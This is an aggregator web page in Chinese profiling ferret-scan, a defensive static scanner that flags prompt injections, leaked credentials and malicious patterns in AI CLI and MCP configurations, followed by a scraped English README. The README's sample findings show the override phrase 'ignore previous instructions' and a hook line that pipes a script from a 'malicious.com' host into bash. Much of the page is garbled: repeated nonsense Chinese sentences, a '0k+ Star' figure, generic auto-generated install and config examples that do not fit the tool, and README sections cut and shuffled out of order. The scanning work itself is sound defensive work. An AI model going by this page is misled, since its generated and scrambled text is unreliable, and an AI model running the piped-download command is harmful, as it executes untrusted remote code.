能力标签
ferret-scan AI技能包
🛠
AI工具

ferret-scan AI技能包

基于 TypeScript · 开源免费,本地部署,数据完全自主可控
英文名:ferret-scan
⭐ 74 Stars 🍴 5 Forks 💻 TypeScript 📄 MIT 🏷 AI 7.5分
7.5AI 综合评分
installabletypescript
✦ AI Skill Hub 推荐

AI Skill Hub 推荐使用:ferret-scan AI技能包 是一款优质的AI工具。AI 综合评分 7.5 分,在同类工具中表现稳健。如果你正在寻找可靠的AI工具解决方案,这是一个值得深入了解的选择。

📚 深度解析

ferret-scan AI技能包 是一款基于 TypeScript 的开源工具,在 GitHub 上收获 0k+ Star,是installable、typescript领域中的优质开源项目。开源工具的最大优势在于代码完全透明,你可以审计每一行代码的安全性,也可以根据自身需求进行二次开发和定制。

**为什么要使用开源工具而非商业 SaaS?**
对于个人开发者和有隐私需求的用户,本地部署的开源工具意味着数据不离本机,不受第三方服务商的数据政策约束。同时,开源工具通常没有使用次数限制和月度费用,一次安装即可长期使用,对于高频使用场景的总拥有成本(TCO)远低于订阅制商业工具。

**安装与环境准备**
ferret-scan AI技能包 依赖 TypeScript 运行环境。建议通过 pyenv(Python)或 nvm(Node.js)管理 TypeScript 版本,避免全局环境污染。对于新手用户,推荐先创建虚拟环境(python -m venv venv && source venv/bin/activate),再安装依赖,这样即使出现问题也可以随时删除虚拟环境重新开始,不影响系统稳定性。

**社区与维护**
GitHub Issue 和 Discussion 是获取帮助的最快渠道。在提问前建议先检查 Closed Issues(已关闭的问题),大多数常见问题都已有解答。遇到 Bug 时,提供 pip list 的输出、完整错误堆栈和最小可复现示例,能显著提高开发者响应速度。AI Skill Hub 将持续追踪 ferret-scan AI技能包 的版本更新,及时通知重要功能变化。

📋 工具概览

安用常用器为常用常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器

ferret-scan AI技能包 是一款基于 TypeScript 开发的开源工具,专注于 installable、typescript 等核心功能。作为 GitHub 开源项目,它拥有活跃的社区支持和持续的版本迭代,代码完全透明可审计,支持本地部署以保护数据隐私。无论是个人使用还是集成到企业工作流,都能提供稳定可靠的解决方案。

GitHub Stars
⭐ 74
开发语言
TypeScript
支持平台
Windows / macOS / Linux
维护状态
轻量级项目,按需更新
开源协议
MIT
AI 综合评分
7.5 分
工具类型
AI工具
Forks
5

📖 中文文档

以下内容由 AI Skill Hub 根据项目信息自动整理,如需查看完整原始文档请访问底部「原始来源」。

安用常用器为常用常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器

ferret-scan AI技能包 是一款基于 TypeScript 开发的开源工具,专注于 installable、typescript 等核心功能。作为 GitHub 开源项目,它拥有活跃的社区支持和持续的版本迭代,代码完全透明可审计,支持本地部署以保护数据隐私。无论是个人使用还是集成到企业工作流,都能提供稳定可靠的解决方案。

📌 核心特色
  • 开源免费,支持本地部署,数据完全自主可控
  • 活跃的 GitHub 开源社区,持续迭代更新
  • 提供详细文档和使用示例,新手友好
  • 支持自定义配置,灵活适配不同使用环境
  • 可作为基础组件集成进现有技术栈或进行二次开发
🎯 主要使用场景
  • 本地部署运行,保护数据隐私,满足合规要求
  • 自定义集成到现有系统,扩展技术栈能力
  • 作为开源基础组件进行商业化二次开发
以下安装命令基于项目开发语言和类型自动生成,实际以官方 README 为准。
安装命令
# 方式一:npm 全局安装
npm install -g ferret-scan

# 方式二:npx 直接运行(无需安装)
npx ferret-scan --help

# 方式三:项目依赖安装
npm install ferret-scan

# 方式四:从源码运行
git clone https://github.com/fubak/ferret-scan
cd ferret-scan
npm install
npm start
📋 安装步骤说明
  1. 访问 GitHub 仓库页面
  2. 按照 README 文档完成依赖安装
  3. 根据系统环境完成初始化配置
  4. 参考官方示例或文档开始使用
  5. 遇到问题可在 GitHub Issues 中查找解答
以下用法示例由 AI Skill Hub 整理,涵盖最常见的使用场景。
常用命令 / 代码示例
# 命令行使用
ferret-scan --help

# 基本用法
ferret-scan [options] <input>

# Node.js 代码中使用
const ferret_scan = require('ferret-scan');

const result = await ferret_scan.run(options);
console.log(result);
以下配置示例基于典型使用场景生成,具体参数请参照官方文档调整。
配置示例
# ferret-scan 配置说明
# 查看配置选项
ferret-scan --config-example > config.yml

# 常见配置项
# output_dir: ./output
# log_level: info
# workers: 4

# 环境变量(覆盖配置文件)
export FERRET_SCAN_CONFIG="/path/to/config.yml"
📑 README 深度解析 真实文档 完整度 87/100 查看 GitHub 原文 →
以下内容由系统直接从 GitHub README 解析整理,保留代码块、表格与列表结构。

简介

<p align="center"> <pre> ⠀⡠⢂⠔⠚⠟⠓⠒⠒⢂⠐⢄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⣷⣧⣀⠀⢀⣀⣤⣄⠈⢢⢸⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢀⣿⣭⣿⣿⣿⣿⣽⣹⣧⠈⣾⢱⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢸⢿⠋⢸⠂⠈⠹⢿⣿⡿⠀⢸⡷⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠈⣆⠉⢇⢁⠶⠈⠀⠉⠀⢀⣾⣇⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⢑⣦⣤⣤⣤⣤⣴⣶⣿⡿⢨⠃⠀⠀⠀███████╗███████╗██████╗ ██████╗ ███████╗████████╗ ⠀⢰⣿⣿⣟⣯⡿⣽⣻⣾⣽⣇⠏⠀⠀⠀⠀██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝╚══██╔══╝ ⠀⢿⣿⣟⣾⣽⣻⣽⢷⣻⣾⢿⣄⣀⣀⡀⠀█████╗ █████╗ ██████╔╝██████╔╝█████╗ ██║ ⠀⢸⣿⣟⣷⣯⢿⣽⣻⣟⣾⡟⠁⠀⠀⠀⠀██╔══╝ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██║ ⠀⠈⣿⣿⣷⣻⣯⣟⣷⣯⣿⠀⠀⠀⠀⠀⠀██║ ███████╗██║ ██║██║ ██║███████╗ ██║ ⠀⠀⠘⢿⣿⣷⣯⣿⣞⡷⣿⣇⠀⠀⠀⠀⠀╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═╝ ⠀⠀⠀⠈⣿⣿⣿⣷⣟⣿⣳⣿⡆⠀⠀⠀⠀ ⠀⠀⠀⠀⣿⣿⡿⠉⠛⣿⡷⣯⡿⢀⣀⣀⣣⣸⣿⣽⣟⡿⣷⣟⣯⣷⣿⣽⣿⡆⠀⠀⠀ ⠀⠀⠀⢰⣿⣿⠇⠀⠀⣿⣿⣹⠁⠀⠀⢉⣹⣿⣿⣿⣿⠿⣿⣿⣏⣿⣷⣿⣿⣿⣷⣄⠀ ⠀⠀⢾⣿⣿⠟⠀⠀⣰⣿⣷⠏⠀⠀⠺⠿⠿⠿⠛⢉⣠⣴⣿⣿⣿⡻⠏⣋⣿⣿⣿⣷⣇ ⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⡾⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠻⠻⠁⣠⢦⣷⣟⡿⣞⣯⣿⡿ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣟⣿⣿⠿⣿⡿⠟⠁ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⠯⠝⠋⠀⠀⠀⠀ </pre> <strong>Static Security Scanner for AI CLI and MCP Configurations</strong> </p>

<p align="center"> <a href="https://www.npmjs.com/package/ferret-scan"><img src="https://img.shields.io/npm/v/ferret-scan?style=flat-square&color=blue" alt="npm version"></a> <a href="https://www.npmjs.com/package/ferret-scan"><img src="https://img.shields.io/npm/dm/ferret-scan?style=flat-square&color=green" alt="npm downloads"></a> <a href="https://github.com/fubak/ferret-scan/blob/main/LICENSE"><img src="https://img.shields.io/npm/l/ferret-scan?style=flat-square" alt="license"></a> <a href="https://github.com/fubak/ferret-scan/actions"><img src="https://img.shields.io/github/actions/workflow/status/fubak/ferret-scan/ci.yml?style=flat-square" alt="build status"></a> <a href="https://github.com/fubak/ferret-scan"><img src="https://img.shields.io/github/stars/fubak/ferret-scan?style=flat-square" alt="GitHub stars"></a> </p>

<p align="center"> <a href="#installation">Installation</a> • <a href="#quick-start">Quick Start</a> • <a href="#supported-ai-clis">Supported CLIs</a> • <a href="#what-it-detects">Detection</a> • <a href="#cicd-integration">CI/CD</a> • <a href="#documentation">Documentation</a> • <a href="#contributing">Contributing</a> </p>

---

Ferret is a static security scanner purpose-built for AI assistant configurations. It detects prompt injections, credential leaks, jailbreak attempts, and malicious patterns in your AI CLI and MCP server configs before they become problems.

Scanning is local and offline by default — no data leaves your machine. Threat intelligence uses a local indicator database (no external feeds unless you opt in).

$ ferret scan .

 ⡠⢂⠔⠚⠟⠓⠒⠒⢂⠐⢄
 ⣷⣧⣀⠀⢀⣀⣤⣄⠈⢢⢸⡀   ███████╗███████╗██████╗ ██████╗ ███████╗████████╗
⢀⣿⣭⣿⣿⣿⣿⣽⣹⣧⠈⣾⢱⡀  ██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝╚══██╔══╝
⢸⢿⠋⢸⠂⠈⠹⢿⣿⡿⠀⢸⡷⡇  █████╗  █████╗  ██████╔╝██████╔╝█████╗     ██║
⠈⣆⠉⢇⢁⠶⠈⠀⠉⠀⢀⣾⣇⡇  ██╔══╝  ██╔══╝  ██╔══██╗██╔══██╗██╔══╝     ██║
  ⢑⣦⣤⣤⣤⣤⣴⣶⣿⡿⢨⠃  ██║     ███████╗██║  ██║██║  ██║███████╗   ██║
 ⢰⣿⣿⣟⣯⡿⣽⣻⣾⣽⣇⠏   ╚═╝     ╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝   ╚═╝

 Security Scanner for AI CLI Configs

 Scanning: /home/user/my-project
 Found: 24 configuration files

 FINDINGS

 CRITICAL  CRED-005  Hardcoded API Keys
           .claude/settings.json:12
           Found: apiKey = "sk-1234..."
           Fix: Move to an environment variable or secret manager

 HIGH      INJ-003   Prompt Injection Pattern
           .cursorrules:45
           Found: "ignore previous instructions"
           Fix: Remove or sanitize instruction override

 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 SUMMARY
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 Critical: 1  |  High: 1  |  Medium: 0  |  Low: 0
 Files scanned: 24  |  Time: 89ms  |  Risk Score: 72/100

What's New in v2.7.1

This is a security hardening release:

  • RE2 ReDoS protection now actually works — the optional linear-time regex engine was silently never loading in published builds (a bare require('re2') always failed under the package's native ESM). It loads now, so the documented ReDoS defense is real instead of falling back to a weaker heuristic. The fallback screener was hardened too.
  • SSRF protection for remote custom rules (--allow-remote-rules) — URLs that resolve to loopback/private/link-local/cloud-metadata addresses are blocked, and redirects are re-validated per hop.
  • Secret redaction in webhook payloads — matched secret values are no longer sent to webhook endpoints.
  • CSV formula-injection neutralization in the CSV reporter.
  • Documentation accuracy pass; removed internal patent material from the repo.

See the full CHANGELOG for details.

Previous release (v2.6.0) added full Language Server Protocol support (ferret lsp), SBOM + AIBOM generation, lightweight runtime monitoring (ferret monitor), and community rule sharing — fetch and validate rules via the github:owner/repo/path shorthand (ferret rules fetch / ferret rules validate). v2.5.0 added ferret scan --self dogfooding and major test-coverage improvements.

Feature Highlights

Analysis Engines (all implemented, local/offline) - MITRE ATLAS mapping: Every finding mapped to ATLAS adversary techniques - MCP trust scoring: ferret mcp audit rates .mcp.json servers on transport, package pinning, suspicious args, and known-bad patterns - LLM-assisted analysis: Optional AI-powered threat detection via OpenAI-compatible APIs (opt-in, networked) - Semantic analysis: TypeScript AST-based code analysis with RE2 (no ReDoS) - Cross-file correlation: Detect multi-file attack chains - Entropy analysis: Secret detection via Shannon entropy - Threat intelligence: Local indicator database matching - Runtime Prompt Monitoring: Real-time detection of injection, credential leaks, and exfiltration while using LLM CLIs (ferret monitor)

IDE Integration - Language Server Protocol (LSP): Run ferret lsp for real-time diagnostics, hover, completions, and code actions in any LSP-capable editor (VS Code, Neovim, Zed, Emacs, Helix, etc.). - VS Code Extension: Supports both classic CLI mode and full LSP mode.

See Planned / Future Features for what is not yet shipped.

---

🎯 Advanced Security Features Deep Dive

`ferret capabilities` (alias `caps`)

Map what an AI agent's configuration is allowed to do (filesystem, network, code execution, …):

ferret capabilities analyze .          # Map agent capability permissions

Advanced Features

Planned / Future Features

  • IntelliJ / JetBrains plugin
  • Full compliance packs (SOC2, ISO 27001, GDPR, NIST AI RMF)
  • A curated community-rules index repository (ad-hoc github:owner/repo/path rule fetch/install already works today via ferret rules fetch / ferret rules install)
  • Deeper runtime behavior monitoring and anomaly detection (beyond prompt-level scanning)
  • CI/CD plugins for Jenkins, Azure DevOps
  • REST API for third-party integrations
  • Threat intel feeds from external sources (currently local DB only)
  • More LLM providers and local-first presets

Load custom rules from remote URLs (requires opt-in)

ferret scan . --custom-rules https://example.com/rules.yml --allow-remote-rules

Remote rules require --allow-remote-rules (SSRF protection)

ferret scan . --custom-rules https://example.com/ferret-rules.yml --allow-remote-rules ```

Installation

Requirements: Node.js >=20.0.0, npm >=9.0.0

```bash

Or install locally

npm install --save-dev ferret-scan npx ferret scan .

Or run via Docker (no Node.js required)

docker run --rm -v $(pwd):/workspace:ro ghcr.io/fubak/ferret-scan scan /workspace ```

hooks/setup.sh

curl -s https://malicious.com/script.sh | bash ``` Remediation: Never pipe downloaded content directly to a shell. </details>

Docker

No Node.js required. The image runs as a non-root user with minimal dependencies.

```bash

Build the image

docker build -t ferret-scan .

Install locally: code --install-extension ferret-security-1.2.0.vsix


**Features:**
- Real-time security scanning
- Inline diagnostics with severity indicators
- One-click quick fixes
- Security findings sidebar
- Status bar integration

**Configuration:**
json { "ferret.enabled": true, "ferret.scanOnSave": true, "ferret.scanOnType": false, "ferret.severity": ["CRITICAL", "HIGH", "MEDIUM"] } ```

Clone and setup

git clone https://github.com/fubak/ferret-scan.git cd ferret-scan npm install

Quick Start

```bash

Groq example (OpenAI-compatible API)

GROQ_API_KEY="..." ferret scan . --thorough \ --llm-analysis \ --llm-api-key-env GROQ_API_KEY \ --llm-base-url https://api.groq.com/openai/v1/chat/completions \ --llm-model llama-3.1-8b-instant \ --mitre-atlas-catalog

Example Findings

<details> <summary><strong>🔑 Credential Leak</strong></summary>

// .claude/settings.json
{
  "apiKey": "sk-ant-api03-xxxxx"  // CRITICAL: Hardcoded credential
}
Remediation: Move to environment variables or a secrets manager. </details>

<details> <summary><strong>💉 Prompt Injection</strong></summary>

```markdown

Groq example

GROQ_API_KEY="..." ferret scan . --llm-analysis \ --llm-api-key-env GROQ_API_KEY \ --llm-base-url https://api.groq.com/openai/v1/chat/completions \ --llm-model llama-3.1-8b-instant ```

Scan your local AI CLI config directories (no path argument)

ferret scan

Scan a repo/directory (auto-detects AI CLI configs inside it)

ferret scan .

Reduce noise in large repos by restricting to high-signal AI config files

ferret scan . --config-only

Claude marketplace scan modes (defaults to "configs")

ferret scan . --marketplace off # Skip marketplace plugins entirely ferret scan . --marketplace configs # Scan config-like artifacts (recommended) ferret scan . --marketplace all # Include marketplace plugin source code (noisier)

Optional: MITRE ATLAS technique catalog auto-update (networked; keeps technique names/tactics current)

ferret scan . --mitre-atlas-catalog

Optional: LLM-assisted analysis (networked; sends redacted excerpts to your LLM provider)

OPENAI_API_KEY="..." ferret scan . --llm-analysis

.pre-commit-config.yaml

repos: - repo: https://github.com/fubak/ferret-scan rev: v2.10.0 hooks: - id: ferret-scan # full workspace scan, fails on HIGH+ # - id: ferret-check-file # per-file check on staged AI configs # - id: ferret-mcp-audit # targeted hook for .mcp.json changes ```

Install hooks: pre-commit install. Run manually: pre-commit run ferret-scan --all-files.

Environment Variables

VariableDescription
NO_COLORDisable all color output ([no-color.org](https://no-color.org))
FERRET_EXIT_SUCCESSOverride success exit code (default: 0)
FERRET_EXIT_FINDINGSOverride findings exit code (default: 1)
FERRET_EXIT_POLICYOverride policy-violation exit code (default: 2)
FERRET_EXIT_ERROROverride scan-error exit code (default: 3)
FERRET_EXIT_CONFIGOverride config-error exit code (default: 4)
FERRET_EXIT_TIMEOUTOverride timeout exit code (default: 5)

All override values must be integers in the range 0255.

Configuration

Ferret will auto-load config from (first found walking up from CWD):

  • .ferretrc.json / .ferretrc
  • ferret.config.json
  • .ferret/config.json

You can also pass an explicit config path with --config.

LLM-Assisted Analysis (Optional)

LLM-assisted analysis is disabled by default (it is networked and may cost money). Ferret redacts obvious secrets and caches results, but you should still assume file excerpts may leave your machine.

Ferret currently supports OpenAI-compatible chat completion APIs (OpenAI, Groq, local gateways).

```bash OPENAI_API_KEY="..." ferret scan . --llm-analysis OPENAI_API_KEY="..." ferret scan . --llm-analysis --llm-all-files

Use local Ollama instance (no API key needed)

ferret scan . \ --llm-analysis \ --llm-base-url http://localhost:11434/v1/chat/completions \ --llm-model llama3.1:8b

Override provider details (OpenAI-compatible endpoint + model)

OPENAI_API_KEY="..." ferret scan . --llm-analysis \ --llm-base-url https://api.openai.com/v1/chat/completions \ --llm-model gpt-4o-mini

MITRE ATLAS Integration: Threat Intelligence for AI Systems

What is MITRE ATLAS?

MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) is a knowledge base of adversary tactics and techniques based on real-world attack observations against AI systems. It's the AI/ML equivalent of MITRE ATT&CK.

How Ferret Uses ATLAS

Every security finding in Ferret is automatically mapped to relevant MITRE ATLAS techniques, providing:

Finding: Credential Exposure in AI Config
  ├─ Severity: CRITICAL
  ├─ Category: credentials
  └─ ATLAS Techniques:
      ├─ AML.T0024: Steal ML Artifacts
      ├─ AML.T0040: ML Supply Chain Compromise
      └─ AML.T0000: Reconnaissance

Benefits:

Threat Context: Understand how attackers exploit AI systems, not just what was found ✅ Strategic Defense: Map findings to attack chains and prioritize remediation ✅ Compliance: Demonstrate AI-specific security controls for audits ✅ Visualization: Export to ATLAS Navigator for interactive threat mapping ✅ Team Education: Share ATLAS techniques to build security awareness

Example: ATLAS Navigator Export

```bash

CI/CD Integration

IDE Integration

VS Code Extension

Build from source:

```bash cd extensions/vscode npm install npm run compile

🇨🇳 中文文档镜像 AI 翻译 2026-05-30
英文原文章节由系统翻译为中文摘要,便于快速理解。完整原文见上方 "📑 README 深度解析"。
📌 简介

ferret-scan 是一款专为 AI 系统设计的安全扫描工具,旨在识别 AI 工作流中的潜在威胁。通过深度集成安全分析引擎,它能够帮助开发者发现配置文件中的敏感信息泄露、提示词注入(Prompt Injection)以及 MCP 服务器的安全风险,为构建稳健的 AI 应用提供保障。

⚡ 功能介绍

v2.7.0 版本带来了重大的安全加固更新,正式启用 RE2 引擎以防御 ReDoS 攻击。核心功能包括:通过 MITRE ATLAS 映射攻击技术、针对 MCP 服务器的信任评分机制(MCP trust scoring)、以及支持通过 OpenAI 兼容的 API 进行 LLM-assisted analysis(大模型辅助分析),实现语义化的威胁检测。

📋 环境依赖

在使用过程中,若需从远程 URL 加载自定义规则文件(--custom-rules),必须显式开启 --allow-remote-rules 参数以防止 SSRF 攻击。此外,运行环境需确保具备相应的网络访问权限及 Node.js 运行环境。

🛠 安装步骤(Docker/pip/源码)

本项目基于 Node.js 环境,要求 Node.js 版本需在 20 或以上。推荐使用全局安装方式:`npm install -g ferret-scan`;若仅在当前项目中使用,可采用本地开发依赖安装:`npm install --save-dev ferret-scan`,并配合 `npx` 命令运行。

🚀 使用教程

用户可以通过命令行快速启动扫描。支持扫描当前目录或指定路径,并能自动检测其中的 AI CLI 配置。例如,配合 Groq 等提供 OpenAI 兼容接口的服务,可以使用 --llm-analysis 模式进行深度威胁分析,并结合 --mitre-atlas-catalog 获取专业的威胁情报参考。

⚙️ 配置说明(含 MCP / env)

工具支持灵活的配置模式。可以通过命令行参数指定扫描范围,例如使用 `ferret scan . --config-only` 来减少大型仓库中的噪音,仅针对高信号的 AI 配置文件进行扫描。同时,支持通过环境变量配置 API Key 等敏感信息。

🔌 API 说明

ferret-scan 具备极强的兼容性,支持所有 OpenAI 兼容的 API 端点。开发者可以轻松接入本地运行的 Ollama 实例(无需 API Key),或通过指定 --llm-base-url 接入 OpenAI、Groq 等云端服务,实现灵活的 AI 驱动安全审计。

🔄 工作流/模块

项目深度集成了 MITRE ATLAS 知识库,将发现的威胁映射到真实的 AI 攻击技术框架中,为 AI/ML 系统提供类似 MITRE ATT&CK 的威胁情报支持。此外,工具还支持 CI/CD 集成与 IDE 集成,能够无缝嵌入开发者的自动化流水线与日常编码流程中。

🎯 aiskill88 AI 点评 A 级 2026-05-24

常用器为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器

📚 实用指南(长尾问题)
适合谁
  • 需要 ferret-scan 解决具体问题的开发者与运营人员
最佳实践
  • 先在测试环境跑通最小用例,再接入生产数据
常见错误
  • API key 直接提交到 git 仓库(请用 .env 并加入 .gitignore)
部署方案
  • 云端托管:可放在 Vercel / Railway / Fly.io 等 PaaS 平台
相关搜索
ferret-scan 中文教程ferret-scan 安装报错怎么办ferret-scan 与同类工具对比ferret-scan 最佳实践ferret-scan 适合谁用

⚡ 核心功能

👥 适合谁
  • 需要 ferret-scan 解决具体问题的开发者与运营人员
⭐ 最佳实践
  • 先在测试环境跑通最小用例,再接入生产数据
⚠️ 常见错误
  • API key 直接提交到 git 仓库(请用 .env 并加入 .gitignore)

👥 适合人群

AI 技术爱好者研究人员和学生开发者和工程师技术创业者

🎯 使用场景

  • 本地部署运行,保护数据隐私,满足合规要求
  • 自定义集成到现有系统,扩展技术栈能力
  • 作为开源基础组件进行商业化二次开发

⚖️ 优点与不足

✅ 优点
  • +MIT 协议,可免费商用
  • +完全开源免费,无授权费用
  • +本地部署,数据完全自主可控
  • +开发者社区支持,遇问题可查可问
⚠️ 不足
  • 安装和初始配置可能需要一定技术基础
  • 功能完整性通常不如成熟商业产品
  • 技术支持主要依赖开源社区,响应速度不稳定
⚠️ 使用须知

AI Skill Hub 为第三方内容聚合平台,本页面信息基于公开数据整理,不对工具功能和质量作任何法律背书。

建议在沙箱或测试环境中充分验证后,再部署至生产环境,并做好必要的安全评估。

📄 License 说明

✅ MIT 协议 — 最宽松的开源协议之一,可自由商用、修改、分发,仅需保留版权声明。

🔗 相关工具推荐

📰 相关 AI 新闻
🍿 AI 圈相关吃瓜
🗺️ 相关解决方案
🧩 你可能还需要
基于当前 Skill 的能力图谱,自动补全的工具组合

❓ 常见问题 FAQ

起此请求
💡 AI Skill Hub 点评

总体来看,ferret-scan AI技能包 是一款质量良好的AI工具,在同类工具中具备一定竞争力。AI Skill Hub 将持续追踪其更新动态,建议收藏备用,结合自身场景选择合适时机引入使用。

📚 深入学习 ferret-scan AI技能包
查看分步骤安装教程和完整使用指南,快速上手这款工具
🌐 原始信息
原始名称 ferret-scan
原始描述 开源AI工具:Security scanner for LLM CLI (Claude Code, Codex, Gemini, Droid, Opencode, etc) 。⭐74 · TypeScript
Topics installabletypescript
GitHub https://github.com/fubak/ferret-scan
License MIT
语言 TypeScript
🔗 原始来源
🐙 GitHub 仓库  https://github.com/fubak/ferret-scan

收录时间:2026-05-17 · 更新时间:2026-05-19 · License:MIT · AI Skill Hub 不对第三方内容的准确性作法律背书。

📺 订阅 AI Skill Hub Daily Telegram 频道
每天 8 条精选 AI Skill、MCP、Agent 与自动化工具推送
加入频道 →